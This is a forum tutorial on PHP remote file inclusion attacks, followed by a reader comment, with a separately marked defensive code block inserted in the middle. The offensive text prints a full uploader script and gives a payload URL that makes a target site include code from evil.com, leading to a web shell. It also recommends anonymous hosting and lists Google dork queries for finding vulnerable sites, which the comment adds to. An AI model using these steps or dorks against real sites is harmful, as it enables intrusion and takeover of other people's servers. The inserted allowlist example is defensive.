Include Exploits
In this article I will teach you the basics of include exploits. If you understand PHP this will help, although not much.
When a site uses one page to call all the others around a basic template, they can become subject to exploitation under certain circumstances.
e.g. http://www.abc.com/index.php?page=news
To test if it's vulnerable, try changing it to abc or any other page that doesn't exist:
e.g. http://www.abc.com/index.php?page=abc
If it's vulnerable you should get an error like this:
Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01
OK, now we are in business. We now know that the script takes $_GET['page'], appends .php, and then includes the result.
e.g. $page = $_GET ['page'] . ".php"; include ($page);
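For the defender's side of the same pattern, here is an added example (not the article's code) that puts the vulnerable include next to an allowlist-based replacement; the page names, the pages/ directory and the php.ini settings mentioned in the comments are assumptions for this example.

```php
<?php
// Added example, not the article's code. The vulnerable pattern the article
// describes hands the request parameter straight to include():
//   $page = $_GET['page'] . ".php"; include($page);
// so page=http://evil.com/uploader becomes the include path.

// Hardened version: the parameter is only a key into a fixed allowlist, so no
// user-controlled string is ever used to build the include path. The page
// names and the pages/ directory are assumptions for this example.
const PAGES = [
    'news'      => 'news.php',
    'downloads' => 'downloads.php',
];

function resolve_page(array $get, string $baseDir): ?string
{
    $requested = $get['page'] ?? 'news';
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;   // unknown key: nothing derived from it reaches include()
    }
    return $baseDir . DIRECTORY_SEPARATOR . PAGES[$requested];
}

$base = __DIR__ . DIRECTORY_SEPARATOR . 'pages';

if (PHP_SAPI === 'cli') {
    // Constructed requests: the article's probe values are rejected, the real key resolves.
    foreach (['news', 'abc', 'http://evil.com/uploader'] as $p) {
        $target = resolve_page(['page' => $p], $base);
        printf("%-26s -> %s\n", $p, $target ?? 'rejected');
    }
    exit;
}

// Web dispatch: include only an allowlisted file, otherwise answer 404 without
// echoing the parameter. Pair this with allow_url_include=Off and
// display_errors=Off in php.ini; the warning quoted in the article leaks the
// server path to anyone who sends a bad value.
$target = resolve_page($_GET, $base);
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

Run from the command line it prints the three resolutions; served by a web server it dispatches only the two allowlisted pages.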
So, what we need now is an uploader to allow us to upload files onto their server. Here's some dazzling code written by cheesy himself:
<?php
if ( $userfile ) {
    @$res = copy($userfile, "$userfile_name");
    if ( !$res ) {
        print "Upload failed! \n";
    } else {
        print "Upload of $userfile_name successful \n";
    }
}
?>
<FORM method=POST ENCTYPE="multipart/form-data">
File to Upload
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000">
<INPUT NAME="userfile" TYPE="file" size=35>
<INPUT TYPE="submit">
</FORM>
</HTML>
So, we need to host this code on a server that doesn't support PHP, or just edit your .htaccess so your server treats it as HTML or similar. A good, simple free host that doesn't support PHP and is quick, easy and anonymous is cjb.net.
So, to exploit the page, simply add the URL of your uploader script:
e.g. http://www.abc.com/index.php?page=http://evil.com/uploader
Remember, if the site appends .php to the page variable, be sure to leave it off your URL. Then the uploader pops up and you can install webadmin or a web-based shell.
To find vulnerable sites, we can use our best friend, Google. Good searches include:
inurl:"index.php?page=downloads" inurl:"index.php?page=news.php"
Be imaginative :)
Thanks for reading and I hope you've learnt something new.
Will.
sam207 16 years ago
"inurl:.php?page=" is a good dork to use, I think. It's a nice article, though I don't feel it's awesome. Very Good I choose.